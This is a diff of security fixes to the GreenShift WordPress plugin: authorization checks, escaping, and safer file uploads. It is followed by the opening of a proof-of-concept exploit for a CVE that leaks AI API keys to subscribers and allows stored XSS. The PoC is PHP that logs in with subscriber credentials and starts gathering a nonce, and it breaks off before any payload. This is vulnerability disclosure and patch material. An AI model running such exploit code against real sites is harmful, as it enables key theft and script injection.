 							$html = $html . $class_style;
 						}
 					}
@@ -1741,11 +1742,12 @@
 					$dynamic_style = gspb_render_style_attributes($block['attrs']['styleAttributes'], '.'.$block['attrs']['localId'], '', isset($block['attrs']['enableSpecificity']) ? $block['attrs']['enableSpecificity'] : false);
 				}
 			}else{
-				$dynamic_style = wp_kses_post($block['attrs']['inlineCssStyles']);
+				$dynamic_style = $block['attrs']['inlineCssStyles'];
 			}
 			$dynamic_style = gspb_get_final_css($dynamic_style);
 			$dynamic_style = gspb_quick_minify_css($dynamic_style);
 			$dynamic_style = htmlspecialchars_decode($dynamic_style);
+			$dynamic_style = wp_strip_all_tags($dynamic_style);
 			if (function_exists('GSPB_make_dynamic_image') && !empty($block['attrs']['background']['dynamicEnable'])) {
 				$dynamic_style = GSPB_make_dynamic_image($dynamic_style, $block['attrs'], $block, $block['attrs']['background'], $block['attrs']['background']['image']);
 			}
@@ -2292,11 +2294,9 @@

 			// Add global JavaScript variables for separated animation classes
 			if (!empty($clip_classes) || !empty($animation_classes)) {
-				$js_variables = '<script>';
-				$js_variables .= 'window.clipClasses = ' . json_encode($clip_classes) . ';';
-				$js_variables .= 'window.animationClasses = ' . json_encode($animation_classes) . ';';
-				$js_variables .= '</script>';
-				echo $js_variables;
+				$js_code = 'window.clipClasses = ' . wp_json_encode($clip_classes) . ';';
+				$js_code .= 'window.animationClasses = ' . wp_json_encode($animation_classes) . ';';
+				wp_print_inline_script_tag($js_code);
 			}
 		}

@@ -2304,6 +2304,7 @@
 			$gs_global_css = gspb_get_final_css($gs_global_css);
 			$gs_global_css = gspb_quick_minify_css($gs_global_css);
 			$gs_global_css = htmlspecialchars_decode($gs_global_css);
+			$gs_global_css = wp_strip_all_tags($gs_global_css);
 			wp_register_style('greenshift-global-css', false);
 			wp_enqueue_style('greenshift-global-css');
 			wp_add_inline_style('greenshift-global-css', $gs_global_css);
@@ -2315,7 +2316,7 @@
 			foreach ($options['global_interactions'] as $index => $value) {
 				if(!empty($value)){
 					$has_value = true;
-					$script .= 'GSPB_Trigger_Actions("front", document.querySelectorAll(".'.esc_attr($index).'"), window, document, null, ''.json_encode($value).'');';
+					$script .= 'GSPB_Trigger_Actions("front", document.querySelectorAll(".'.esc_attr($index).'"), window, document, null, ''.wp_json_encode($value).'');';
 				}
 			}
 			if($has_value){
@@ -2437,7 +2438,7 @@
 			body:has(.gspb_inspector_btn--darkmode--active) .editor-styles-wrapper{';
 			foreach ($options['darkmodecolors'] as $key=>$element) {
 				if (!empty($element)) {
-					$nightcolor_css .= $key . ':' . $element . ';';
+					$nightcolor_css .= esc_attr($key) . ':' . esc_attr($element) . ';';
 				}
 			}
 			$nightcolor_css .= '}';
@@ -2492,7 +2493,7 @@
 			foreach ($options['global_interactions'] as $index => $value) {
 				if(!empty($value)){
 					$has_value = true;
-					$script .= 'GSPB_Trigger_Actions("front", document.querySelectorAll(".'.esc_attr($index).'"), window, document, null, ''.json_encode($value).'');';
+					$script .= 'GSPB_Trigger_Actions("front", document.querySelectorAll(".'.esc_attr($index).'"), window, document, null, ''.wp_json_encode($value).'');';
 				}
 			}
 			if($has_value){
@@ -3604,43 +3605,8 @@
 			return new WP_Error('no_file', 'No file was uploaded', array('status' => 400));
 		}

-		// Get WordPress upload directory
-		$upload_dir = wp_upload_dir();
-		$custom_dir = $upload_dir['basedir'] . '/api_upload';
-
-		// Create custom upload directory if it doesn't exist
-		if (!file_exists($custom_dir)) {
-			wp_mkdir_p($custom_dir);
-
-			// Create .htaccess to prevent directory listing but allow file access
-			$htaccess_content = "Options -Indexesn";
-			file_put_contents($custom_dir . '/.htaccess', $htaccess_content);
-		}
-
 		// Get file details
 		$file = $_FILES['file'];
-		$filename = sanitize_file_name($file['name']);
-		$tmp_name = $file['tmp_name'];
-
-		// Enhanced security checks
-		$allowed_types = array(
-			'image/jpeg',
-			'image/jpg',
-			'image/png',
-			'image/gif',
-			'image/webp',
-			'image/heic',
-			'image/heif',
-			'application/pdf',
-			'application/text',
-		);
-
-		// Verify file type using WordPress function
-		$filetype = wp_check_filetype($filename);
-		$mime_type = !empty($filetype['ext']) ? $filetype['ext'] : '';
-		if (!$mime_type || !in_array($filetype['type'], $allowed_types)) {
-			return new WP_Error('invalid_file_type', 'File type not allowed', array('status' => 400));
-		}

 		// Check file size (limit to 10MB)
 		$max_size = 10 * 1024 * 1024;
@@ -3648,132 +3614,96 @@
 			return new WP_Error('file_too_large', 'File size exceeds limit of 10MB', array('status' => 400));
 		}

-		// Generate unique filename with timestamp
-		$file_ext = pathinfo($filename, PATHINFO_EXTENSION);
-		$new_filename = sprintf(
-			'%s_%s.%s',
-			uniqid(),
-			time(),
-			$file_ext
+		// Include required WordPress files for media handling
+		require_once(ABSPATH . 'wp-admin/includes/file.php');
+		require_once(ABSPATH . 'wp-admin/includes/image.php');
+		require_once(ABSPATH . 'wp-admin/includes/media.php');
+
+		// Define allowed mime types
+		$allowed_types = array(
+			'jpg|jpeg|jpe' => 'image/jpeg',
+			'png'          => 'image/png',
+			'gif'          => 'image/gif',
+			'webp'         => 'image/webp',
+			'heic'         => 'image/heic',
+			'heif'         => 'image/heif',
+			'pdf'          => 'application/pdf',
+			'txt'          => 'text/plain',
 		);
-		$destination = $custom_dir . '/' . $new_filename;

-		// Move file to destination
-		if (!move_uploaded_file($tmp_name, $destination)) {
-			// Clean up on failure
-			if (file_exists($tmp_name)) {
-				unlink($tmp_name);
-			}
-			return new WP_Error('upload_failed', 'Failed to upload file', array('status' => 500));
+		// Use WordPress's built-in upload handler
+		$upload_overrides = array(
+			'test_form' => false,
+			'mimes'     => $allowed_types,
+		);
+
+		$uploaded_file = wp_handle_upload($file, $upload_overrides);
+
+		if (isset($uploaded_file['error'])) {
+			return new WP_Error('upload_failed', $uploaded_file['error'], array('status' => 500));
 		}

-		// Add file to WordPress media library
+		// Prepare attachment data
+		$filename = sanitize_file_name($file['name']);
 		$attachment = array(
-			'post_mime_type' => $mime_type,
-			'post_title' => sanitize_file_name($filename),
-			'post_content' => '',
-			'post_status' => 'inherit'
+			'post_mime_type' => $uploaded_file['type'],
+			'post_title'     => sanitize_file_name(pathinfo($filename, PATHINFO_FILENAME)),
+			'post_content'   => '',
+			'post_status'    => 'inherit'
 		);

-		$attach_id = wp_insert_attachment($attachment, $destination);
+		// Insert attachment into WordPress media library
+		$attach_id = wp_insert_attachment($attachment, $uploaded_file['file']);
 		if (is_wp_error($attach_id)) {
 			// Clean up on failure
-			unlink($destination);
+			wp_delete_file($uploaded_file['file']);
 			return $attach_id;
 		}

-		// Generate metadata for the attachment
-		require_once(ABSPATH . 'wp-admin/includes/image.php');
-		$attach_data = wp_generate_attachment_metadata($attach_id, $destination);
+		// Generate attachment metadata
+		$attach_data = wp_generate_attachment_metadata($attach_id, $uploaded_file['file']);
 		wp_update_attachment_metadata($attach_id, $attach_data);

 		// Return success response with file details
 		return array(
-			'success' => true,
-			'file_url' => wp_get_attachment_url($attach_id),
-			'file_path' => $destination,
+			'success'       => true,
+			'file_url'      => $uploaded_file['url'],
+			'file_path'     => $uploaded_file['file'],
 			'attachment_id' => $attach_id,
-			'mime_type' => $mime_type,
-			'file_size' => $file['size']
+			'mime_type'     => $uploaded_file['type'],
+			'file_size'     => $file['size']
 		);
 	} else {
 		return new WP_Error('invalid_type', 'Invalid API type specified', array('status' => 400));
 	}

-	// Check if streaming is enabled
-	$is_streaming = isset($body['stream']) && $body['stream'] === true;
-
-	if ($is_streaming) {
-		// Set proper headers for streaming
-		header('Content-Type: text/event-stream');
-		header('Cache-Control: no-cache');
-		header('Connection: keep-alive');
-		header('X-Accel-Buffering: no'); // Important for Nginx
-
-		// Ensure output buffering is handled properly
-		if (ob_get_level() > 0) {
-			ob_end_flush();
-		}
-
-		// Initialize cURL
-		$ch = curl_init($endpoint);
-		curl_setopt($ch, CURLOPT_POST, 1);
-		curl_setopt($ch, CURLOPT_HTTPHEADER, [
-			'Authorization: Bearer ' . $api_key,
-			'Content-Type: application/json'
-		]);
-		curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($body));
-		curl_setopt($ch, CURLOPT_WRITEFUNCTION, function($ch, $data) {
-			// Process each chunk of data
-			echo $data; // Simply forward the data as-is
-
-			// Force flush after each chunk
-			if (ob_get_level() > 0) {
-				ob_flush();
-			}
-			flush();
-
-			return strlen($data);
-		});
-
-		$response = curl_exec($ch);
-
-		if (curl_errno($ch)) {
-			echo "data: " . json_encode(['error' => curl_error($ch)]) . "nn";
-			flush();
-		}
-
-		curl_close($ch);
-		exit;
-	} else {
-		// Standard non-streaming request
-		$response = wp_safe_remote_post($endpoint, array(
-			'headers' => $headers,
-			'body' => json_encode($body),
-			'timeout' => 120
-		));
-
-		if (is_wp_error($response)) {
-			return $response;
-		}
-
-		$response_code = wp_remote_retrieve_response_code($response);
-		$response_body = wp_remote_retrieve_body($response);
-
-		if ($response_code !== 200) {
-			return new WP_Error(
-				'api_error',
-				'Error from OpenAI API: ' . $response_body,
-				array('status' => $response_code)
-			);
-		}
-
-		$result = json_decode($response_body, true);
+	// Standard non-streaming request
+	$response = wp_safe_remote_post($endpoint, array(
+		'headers' => $headers,
+		'body' => json_encode($body),
+		'timeout' => 120
+	));
+
+	if (is_wp_error($response)) {
+		return $response;
 	}

+	$response_code = wp_remote_retrieve_response_code($response);
+	$response_body = wp_remote_retrieve_body($response);
+
+	if ($response_code !== 200) {
+		return new WP_Error(
+			'api_error',
+			'Error from OpenAI API: ' . $response_body,
+			array('status' => $response_code)
+		);
+	}
+
+	$result = json_decode($response_body, true);
 	return $result;
 }

+
 //////////////////////////////////////////////////////////////////
 // USDZ support until WP will have it
 //////////////////////////////////////////////////////////////////
@@ -3805,6 +3735,11 @@
 if (!function_exists('gspb_get_all_layouts')) {
 	function gspb_get_all_layouts()
 	{
+		if (!current_user_can('edit_posts')) {
+			wp_send_json_error('Insufficient permissions', 403);
+		}
+		check_ajax_referer('gspb_nonce', 'security');
+
 		$get_args  = array('timeout' => 200, 'sslverify' => false);
 		$category  = intval($_POST['category_id']);
 		$page      = !empty($_POST['page']) ? intval($_POST['page']) : 1;
@@ -3847,7 +3782,7 @@
 }

 function gspb_isIncludedDomain($url, $included_domains) {
-    $parsed_url = parse_url($url);
+    $parsed_url = wp_parse_url($url);
     if (!isset($parsed_url['host'])) {
         return false; // Not a valid URL
     }
@@ -3876,9 +3811,9 @@
 		$public_assets_url = '';
 		if(!empty($_POST['download_url']) || !empty($_POST['download_url_animated'])){
 			if(!empty($_POST['download_animated']) && $_POST['download_animated'] == 'yes' && !empty($_POST['download_url_animated'])){
-				$apiUrl   = esc_url($_POST['download_url_animated']);
+				$apiUrl   = esc_url(sanitize_text_field(wp_unslash($_POST['download_url_animated'])));
 			}else{
-				$apiUrl   = esc_url($_POST['download_url']);
+				$apiUrl   = esc_url(sanitize_text_field(wp_unslash($_POST['download_url'])));
 			}
 			$included_domains = ["wpsoul.net", "greenshiftwp.com", "wpsoul.com"];
 			if (gspb_isIncludedDomain($apiUrl, $included_domains)) {
@@ -4035,14 +3970,14 @@
 					$responsecss = wp_safe_remote_get($cssUrl, $get_args);
 					$request_resultcss = wp_remote_retrieve_body($responsecss);
 					if ($request_resultcss) {
-						$layout_styles = strip_tags($request_resultcss);
+						$layout_styles = wp_strip_all_tags($request_resultcss);
 						$layout_styles = trim($layout_styles, '"');
 						update_post_meta($pageid, '_gspb_post_css', $layout_styles);
 					}
 				}
-				echo $request_result;
+				echo wp_kses_post($request_result);
 			}else{
-			echo $request_result;
+			echo wp_kses_post($request_result);
 			}
 		}
 		wp_die();
@@ -4052,25 +3987,44 @@
 if (!function_exists('gspb_get_categories')) {
 	function gspb_get_categories()
 	{
+		if (!current_user_can('edit_posts')) {
+			wp_send_json_error('Insufficient permissions', 403);
+		}
+		check_ajax_referer('gspb_nonce', 'security');
+
 		$get_args = array(
 			'timeout'   => 200,
 			'sslverify' => false,
 		);
-		$id       = intval($_POST['category_id']);
+		$id       = isset($_POST['category_id']) ? intval($_POST['category_id']) : 0;
 		$apiUrl   = TEMPLATE_SERVER_URL . '/wp-json/wp/v2/categories?parent=' . $id;
 		$response = wp_safe_remote_get($apiUrl, $get_args);
+
+		if (is_wp_error($response)) {
+			wp_send_json_error('Failed to fetch categories', 500);
+		}
+
 		$request_result = wp_remote_retrieve_body($response);
-		if ($request_result == '') {
-			return false;
-		} else {
-			echo wp_remote_retrieve_body($response);
+		if ($request_result === '') {
+			wp_send_json_error('Empty response', 404);
 		}
-		wp_die();
+
+		$data = json_decode($request_result, true);
+		if (json_last_error() !== JSON_ERROR_NONE) {
+			wp_send_json_error('Invalid JSON response', 500);
+		}
+
+		wp_send_json($data);
 	}
 }

 function gspb_get_saved_block()
 {
+	if (!current_user_can('edit_posts')) {
+		wp_send_json_error('Insufficient permissions', 403);
+	}
+	check_ajax_referer('gspb_nonce', 'security');
+
 	$args = array(
 		'post_type'   => 'wp_block',
 		'post_status' => 'publish',
@@ -4086,7 +4040,7 @@
 	$wp_blocks = $get_posts->query($r);
 	$response = array(
 		'blocks' => $wp_blocks,
-		'admin' => admin_url()
+		'admin' => esc_url(admin_url())
 	);
 	wp_send_json_success($response);
 }
@@ -4132,13 +4086,25 @@
 	}

 	// Verify nonce
-	if (!wp_verify_nonce($_POST['nonce'], 'gspb_install_addon_nonce')) {
+	if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'gspb_install_addon_nonce')) {
 		wp_die(json_encode(array('success' => false, 'message' => 'Security check failed')));
 	}

 	$addon_slug = sanitize_text_field($_POST['addon_slug']);
 	$download_url = esc_url_raw($_POST['download_url']);

+	$allowed_addons = array(
+		'greenshiftchart',
+		'greenshiftgsap',
+		'greenshiftwoo',
+		'greenshiftseo',
+		'greenshiftquery',
+	);
+
+	if (!in_array($addon_slug, $allowed_addons, true)) {
+		wp_die(json_encode(array('success' => false, 'message' => 'Not allowed to install this addon')));
+	}
+
 	// Check if plugin folder already exists
 	$plugin_dir = WP_PLUGIN_DIR . '/' . $addon_slug;
 	if (is_dir($plugin_dir)) {
@@ -4184,7 +4150,7 @@

 	// Clean up temp file
 	if (file_exists($temp_file)) {
-		unlink($temp_file);
+		wp_delete_file($temp_file);
 	}

 	if (is_wp_error($result)) {
@@ -4212,7 +4178,7 @@
         }

         // Verify nonce
-        if (!wp_verify_nonce($_POST['nonce'], 'gspb_activate_addon_nonce')) {
+        if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'gspb_activate_addon_nonce')) {
             wp_die(json_encode(array('success' => false, 'message' => 'Security check failed')));
         }

--- a/greenshift-animation-and-page-builder-blocks/page-templates/canvas-scroll.php
+++ b/greenshift-animation-and-page-builder-blocks/page-templates/canvas-scroll.php
@@ -18,7 +18,7 @@
     <meta name="viewport" content="width=device-width, initial-scale=1" />
     <link rel="profile" href="https://gmpg.org/xfn/11" />
     <?php if (!current_theme_supports('title-tag')) : ?>
-        <title><?php echo wp_get_document_title(); ?></title>
+        <title><?php echo esc_html(wp_get_document_title()); ?></title>
     <?php endif; ?>
     <?php wp_head(); ?>
 </head>
@@ -36,7 +36,7 @@
             <?php wp_body_open(); ?>
             <?php while (have_posts()) : the_post(); ?>
                 <div class="entry-content wp-block-post-content">
-                    <?php echo ''.$the_content.''; ?>
+                    <?php echo $the_content; ?>
                 </div>
             <?php endwhile; ?>
             <?php wp_footer(); ?>
--- a/greenshift-animation-and-page-builder-blocks/page-templates/canvas.php
+++ b/greenshift-animation-and-page-builder-blocks/page-templates/canvas.php
@@ -17,7 +17,7 @@
         <meta name="viewport" content="width=device-width, initial-scale=1" />
         <link rel="profile" href="https://gmpg.org/xfn/11" />
         <?php if ( ! current_theme_supports( 'title-tag' ) ) : ?>
-            <title><?php echo wp_get_document_title(); ?></title>
+            <title><?php echo esc_html(wp_get_document_title()); ?></title>
         <?php endif; ?>
         <?php wp_head(); ?>
     </head>
--- a/greenshift-animation-and-page-builder-blocks/page-templates/full-width.php
+++ b/greenshift-animation-and-page-builder-blocks/page-templates/full-width.php
@@ -19,7 +19,7 @@
         <meta name="viewport" content="width=device-width, initial-scale=1" />
         <link rel="profile" href="https://gmpg.org/xfn/11" />
         <?php if ( ! current_theme_supports( 'title-tag' ) ) : ?>
-            <title><?php echo wp_get_document_title(); ?></title>
+            <title><?php echo esc_html(wp_get_document_title()); ?></title>
         <?php endif; ?>
         <?php wp_head(); ?>
     </head>
--- a/greenshift-animation-and-page-builder-blocks/plugin.php
+++ b/greenshift-animation-and-page-builder-blocks/plugin.php
@@ -6,7 +6,7 @@
  * Author: Wpsoul
  * Author URI: https://greenshiftwp.com
  * Plugin URI: https://greenshiftwp.com
- * Version: 12.6
+ * Version: 12.6.1
  * Text Domain: greenshift-animation-and-page-builder-blocks
  * License: GPL2+
  * License URI: https://www.gnu.org/licenses/gpl-2.0.txt
@@ -176,7 +176,6 @@
 require_once GREENSHIFT_DIR_PATH . 'init.php';
 require_once GREENSHIFT_DIR_PATH . 'includes/helper.php';
 require_once GREENSHIFT_DIR_PATH . 'settings.php';
-//require_once GREENSHIFT_DIR_PATH . 'includes/patterns.php';
 require_once GREENSHIFT_DIR_PATH . 'includes/jsoptimization.php';
 require_once GREENSHIFT_DIR_PATH . 'includes/importer.php';

@@ -184,7 +183,6 @@
 add_action('plugins_loaded', 'gspb_GreenShift_plugin_init');
 function gspb_GreenShift_plugin_init()
 {
-	load_plugin_textdomain('greenshift-animation-and-page-builder-blocks', false, GREENSHIFT_DIR_PATH . 'lang'); //translation files
 	if (class_exists('EddLicensePage')) {
 		new EddLicensePage();
 	}
@@ -201,9 +199,11 @@
 			return;
 		}
 		if(defined('GREENSHIFT_THEME_VERSION')){
-			exit(wp_redirect(admin_url('admin.php?page=greenshift_theme_settings')));
+			wp_redirect(esc_url(admin_url('admin.php?page=greenshift_theme_settings')));
+			exit;
 		}else{
-			exit(wp_redirect(admin_url('admin.php?page=greenshift_dashboard')));
+			wp_redirect(esc_url(admin_url('admin.php?page=greenshift_dashboard')));
+			exit;
 		}
 	}
 }
--- a/greenshift-animation-and-page-builder-blocks/settings.php
+++ b/greenshift-animation-and-page-builder-blocks/settings.php
@@ -418,12 +418,12 @@
 				});
 			</script>
 			<div class="stylebook_form_wrap" style="padding:25px">
-				<h1><?php _e('GreenShift Stylebook', 'greenshift-animation-and-page-builder-blocks'); ?></h1>
+				<h1><?php esc_html_e('GreenShift Stylebook', 'greenshift-animation-and-page-builder-blocks'); ?></h1>
 				<div id="ajax-response"> </div>
 				<form id="stylebook_generation" method="post" class="stylbook_btn_wrapper">
 					<?php wp_nonce_field('gspb_generate_stylebook', 'gspb_stylebook'); ?>
 					<div class="stylbook_btn_wrapper">
-						<input type="submit" id="greenshift_stylebook_btn" name="greenshift_stylebook_btn" value=<?php _e('Create Stylebook', 'greenshift-animation-and-page-builder-blocks'); ?> class="button button-primary button-large">
+						<input type="submit" id="greenshift_stylebook_btn" name="greenshift_stylebook_btn" value="<?php esc_html_e('Create Stylebook', 'greenshift-animation-and-page-builder-blocks'); ?>" class="button button-primary button-large">
 						<span class="spinner"></span>
 					</div>
 				</form>
@@ -617,7 +617,7 @@
 														</tr>
 													</table>

-													<input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings"); ?>" class="button button-primary button-large">
+													<input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings", 'greenshift-animation-and-page-builder-blocks'); ?>" class="button button-primary button-large">
 												</div>

 											</form>
@@ -699,7 +699,7 @@
 																</svg></div>
 															<div class="gs-box-text">
 																<?php esc_html_e("Install Smart Code AI free plugin to enable code editor in block HTML/CSS panels", 'greenshift-animation-and-page-builder-blocks'); ?>
-																<a target="_blank" href="<?php echo admin_url('plugin-install.php?s=Greenshift%2520Smart%2520Code%2520AI&tab=search&type=term');?>" target="_blank"><?php esc_html_e("Download", 'greenshift-animation-and-page-builder-blocks'); ?></a>
+																<a target="_blank" href="<?php echo esc_url(admin_url('plugin-install.php?s=Greenshift%2520Smart%2520Code%2520AI&tab=search&type=term'));?>" target="_blank"><?php esc_html_e("Download", 'greenshift-animation-and-page-builder-blocks'); ?></a>
 															</div>
 														</div>
 													</div>
@@ -763,7 +763,7 @@
 														</tr>
 													</table>

-													<input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings"); ?>" class="button button-primary button-large">
+													<input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings", "greenshift-animation-and-page-builder-blocks"); ?>" class="button button-primary button-large">
 												</div>

 											</form>
@@ -834,7 +834,7 @@
 													<td>
 														<input name="row" type="text" value="<?php if (isset($global_settings['breakpoints']['row'])) {
 															echo esc_attr($global_settings['breakpoints']['row']);
-														} ?>" placeholder="<?php echo apply_filters('gspb_default_row_width_px', 1200); ?>" />
+														} ?>" placeholder="<?php echo esc_attr(apply_filters('gspb_default_row_width_px', 1200)); ?>" />
 													</td>
 												</tr>
 												<tr>
@@ -924,7 +924,7 @@
 													</table>


-													<input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings"); ?>" class="button button-primary button-large javascript_delay_submit">
+													<input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings", "greenshift-animation-and-page-builder-blocks"); ?>" class="button button-primary button-large javascript_delay_submit">
 												</div>
 											</form>
 										</div>
@@ -1153,7 +1153,7 @@
 													</table>


-													<input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings"); ?>" class="button button-primary button-large">
+													<input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings", "greenshift-animation-and-page-builder-blocks"); ?>" class="button button-primary button-large">
 												</div>
 											</form>
 										</div>
@@ -1310,13 +1310,13 @@
 												<?php wp_nonce_field('gspb_settings_page_action', 'gspb_settings_field'); ?>
 												<table class="form-table">
 													<tr>
-														<th> <label for="custom_code_in_head"><?php esc_html_e("Custom code in head section", 'greenshift'); ?></label> </th>
+														<th> <label for="custom_code_in_head"><?php esc_html_e("Custom code in head section", 'greenshift-animation-and-page-builder-blocks'); ?></label> </th>
 														<td>
 															<textarea name="custom_code_in_head" id="" cols="30" rows="10" style="width: 100%"><?php echo $custom_code_in_head ?></textarea>
 														</td>
 													</tr>
 													<tr>
-														<th> <label for="custom_code_before_closed_body"><?php esc_html_e("Custom code before closed Body", 'greenshift'); ?></label> </th>
+														<th> <label for="custom_code_before_closed_body"><?php esc_html_e("Custom code before closed Body", 'greenshift-animation-and-page-builder-blocks'); ?></label> </th>
 														<td>
 															<textarea name="custom_code_before_closed_body" id="" cols="30" rows="10" style="width: 100%"><?php echo $custom_code_before_closed_body ?></textarea>
 														</td>
@@ -1492,23 +1492,39 @@
 			$upload_dir = $upload['basedir'] . '/GreenShift/fonts';
 			$upload_url = $upload['baseurl'] . '/GreenShift/fonts';

+			// Initialize WordPress Filesystem
+			global $wp_filesystem;
+			if (empty($wp_filesystem)) {
+				require_once(ABSPATH . 'wp-admin/includes/file.php');
+				WP_Filesystem();
+			}
+
 			foreach (array_keys($files) as $filename) {
 				foreach ($files[$filename]["error"] as $key => $error) {
 					if ($error == UPLOAD_ERR_OK) {
 						$tmp_name = $files[$filename]["tmp_name"][$key];
-						$name = basename($files[$filename]["name"][$key]);
-						$ext = pathinfo($name, PATHINFO_EXTENSION);
+						$name = sanitize_file_name(basename($files[$filename]["name"][$key]));
+						$ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
+
+						// Validate file extension against allowed font types
+						if (!in_array($ext, $this->allowed_font_ext)) continue;
+
+						// Verify the uploaded file is valid
+						if (!is_uploaded_file($tmp_name)) continue;
+
 						$font_dir = $upload_dir . '/font_' . ($key + 1) . '/' . $ext;

-						$this->gspb_rm_rec($font_dir); //clean up dir before download
+						$this->gspb_rm_rec($font_dir); // clean up dir before download

 						if (!wp_mkdir_p($font_dir)) {
 							return false;
 						}

-						if(!in_array($ext, $this->allowed_font_ext)) continue;
+						$destination = trailingslashit($font_dir) . $name;

-						if (move_uploaded_file($tmp_name, "$font_dir/$name")) {
+						// Read the uploaded file content and write using WP_Filesystem
+						$file_content = $wp_filesystem->get_contents($tmp_name);
+						if ($file_content !== false && $wp_filesystem->put_contents($destination, $file_content, FS_CHMOD_FILE)) {
 							$result[$key][$ext] = $upload_url . '/font_' . ($key + 1) . '/' . $ext . '/' . $name;
 						}
 					}
@@ -1520,7 +1536,7 @@

 		public function gspb_rm_rec($path)
 		{
-			if (is_file($path)) return unlink($path);
+			if (is_file($path)) return wp_delete_file($path);
 			if (is_dir($path)) {
 				foreach (scandir($path) as $p) if (($p != '.') && ($p != '..'))
 					$this->gspb_rm_rec($path . '/' . $p);
@@ -1548,12 +1564,12 @@

 				case 'gs-reusable-preview':

-					echo '<p><input type="text" style="width:350px" value="[wp_reusable_render id='' . $ID . '']" readonly=""></p>';
-					echo '<p>' . esc_html__('If you use template inside other dynamic ajax blocks', 'greenshift-animation-and-page-builder-blocks') . '<br><input type="text" style="width:350px" value="[wp_reusable_render inlinestyle=1 id='' . $ID . '']" readonly="">';
-					echo '<p>' . esc_html__('Shortcode for Ajax render:', 'greenshift-animation-and-page-builder-blocks') . '<br><input type="text" style="width:350px" value="[wp_reusable_render ajax=1 height=100px id='' . $ID . '']" readonly="">';
-					echo '<p>' . esc_html__('Hover trigger:', 'greenshift-animation-and-page-builder-blocks') . ' <code>gs-el-onhover load-block-' . $ID . '</code>';
-					echo '<p>' . esc_html__('Click trigger:', 'greenshift-animation-and-page-builder-blocks') . ' <code>gs-el-onclick load-block-' . $ID . '</code>';
-					echo '<p>' . esc_html__('On view trigger:', 'greenshift-animation-and-page-builder-blocks') . ' <code>gs-el-onview load-block-' . $ID . '</code>';
+					echo '<p><input type="text" style="width:350px" value="[wp_reusable_render id='' . (int)$ID . '']" readonly=""></p>';
+					echo '<p>' . esc_html__('If you use template inside other dynamic ajax blocks', 'greenshift-animation-and-page-builder-blocks') . '<br><input type="text" style="width:350px" value="[wp_reusable_render inlinestyle=1 id='' . (int)$ID . '']" readonly="">';
+					echo '<p>' . esc_html__('Shortcode for Ajax render:', 'greenshift-animation-and-page-builder-blocks') . '<br><input type="text" style="width:350px" value="[wp_reusable_render ajax=1 height=100px id='' . (int)$ID . '']" readonly="">';
+					echo '<p>' . esc_html__('Hover trigger:', 'greenshift-animation-and-page-builder-blocks') . ' <code>gs-el-onhover load-block-' . (int)$ID . '</code>';
+					echo '<p>' . esc_html__('Click trigger:', 'greenshift-animation-and-page-builder-blocks') . ' <code>gs-el-onclick load-block-' . (int)$ID . '</code>';
+					echo '<p>' . esc_html__('On view trigger:', 'greenshift-animation-and-page-builder-blocks') . ' <code>gs-el-onview load-block-' . (int)$ID . '</code>';
 					break;

 				default:
@@ -1589,10 

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1927 - GreenShift - Animation and Page Builder Blocks <= 12.6 - Missing Authorization to Authenticated (Subscriber+) Information Disclosure of AI API Keys and Stored Cross-Site Scripting via custom_css

<?php
/**
 * Proof of Concept for CVE-2026-1927
 * Requires valid WordPress subscriber credentials
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Step 1: Authenticate to WordPress
function wp_login($url, $username, $password) {
    $login_url = $url . '/wp-login.php';
    
    // First request to get login form and nonce
    $ch = curl_init($login_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
    curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $response = curl_exec($ch);
    
    // Extract log nonce from the response
    preg_match('/name="log" value="([^"]*)"/', $response, $log_matches);
    preg_match('/name="pwd" value="([^"]*)"/', $response, $pwd_matches);
    preg_match('/name="wp-submit" value="([^"]*)"/', $response, $submit_matches);
    
    // Prepare login POST data
    $post_data = http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => $submit_matches[1] ?? 'Log In',
        'redirect_to' => $url . '/wp-admin/',
        'testcookie' => '1'
    ]);
    
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    return strpos($response, 'Dashboard') !== false;
}

// Step 2: Get WordPress nonce for AJAX requests
function get_ajax_nonce($url) {
    $admin_url = $url . '/wp-admin/admin-ajax.php';
    
    $ch = curl_init($admin_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
    curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
        'action' => 'heartbeat',
        '_nonce' => ''
    ]));
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // Extract nonce from heartbeat response
